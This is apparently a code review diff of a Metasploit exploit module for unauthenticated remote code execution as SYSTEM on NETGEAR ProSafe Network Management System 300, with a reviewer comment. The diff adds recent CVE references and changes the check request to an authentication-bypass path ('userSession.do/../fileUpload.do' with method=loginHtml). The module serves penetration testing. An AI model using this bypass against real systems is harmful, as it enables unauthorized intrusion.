modules/exploits/windows/http/netgear_nms_rce.rb

```diff
@@ -10,75 +10,87 @@ class MetasploitModule < Msf::Exploit::Remote
+          The application has multiple vulnerabilities that can allow an unauthenticated remote
+          attacker to execute code as SYSTEM user. Vulnerabilities include authentication bypass,
+          SQL injection, arbitrary file upload, and privilege escalation across various versions.
+          This module is able to spawn a meterpreter session by chaining together two specific
+          vulnerabilities inside the FileUploadController and MyHandlerInterceptor classes.
+          This module has been tested with versions 1.5.0.2, 1.4.0.17, 1.1.0.13, 1.7.0.12, and 1.7.0.1.
+        },
+        'Author' => [
+          'Ege BALCI <egebalci[at]pm.me>', # Msf module update for CVE-2023-38096 and CVE-2023-38098
+          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and updated MSF module
         ],
-      'License' => MSF_LICENSE,
-      'References' =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['ZDI', '23-920'],
+          ['ZDI', '23-918'],
+          ['CVE', '2023-38096'],
+          ['CVE', '2023-38098'],
           ['CVE', '2016-1525'],
           ['US-CERT-VU', '777024'],
           ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'],
-          ['URL', 'https://seclists.org/fulldisclosure/2016/Feb/30']
+          ['URL', 'https://seclists.org/fulldisclosure/2016/Feb/30'],
+          ['URL', 'https://kb.netgear.com/000065707/Security-Advisory-for-Multiple-Vulnerabilities-on-the-ProSAFE-Network-Management-System-PSV-2023-0024-PSV-2023-0025'],
         ],
-      'DefaultOptions' => { 'WfsDelay' => 5 },
-      'Platform' => 'win',
-      'Arch' => ARCH_X86,
-      'Privileged' => true,
-      'Targets' =>
-        [
+        'DefaultOptions' => { 'WfsDelay' => 5 },
+        'Platform' => ['win'],
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
           [ 'NETGEAR ProSafe Network Management System 300 / Windows', {} ]
         ],
-      'DefaultTarget' => 0,
-      'DisclosureDate' => '2016-02-04'))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2016-02-04',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(8080),
-        OptString.new('TARGETURI', [true,  "Application path", '/'])
-      ])
+        OptString.new('TARGETURI', [true, 'Application path', '/'])
+      ]
+    )
   end
 
-
   def check
     res = send_request_cgi({
-      'uri'    => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'),
-      'method' => 'GET'
+      'uri' => normalize_uri(datastore['TARGETURI'], 'userSession.do/../fileUpload.do'),
+      'method' => 'POST',
+      'vars_get' => { 'method' => 'loginHtml' } # This is required for auth bypass above v1.5.0.11
```

Comment:
Looks like this has already been tested; but just as a note to the R7 tester to verify the previous versions still work :+1: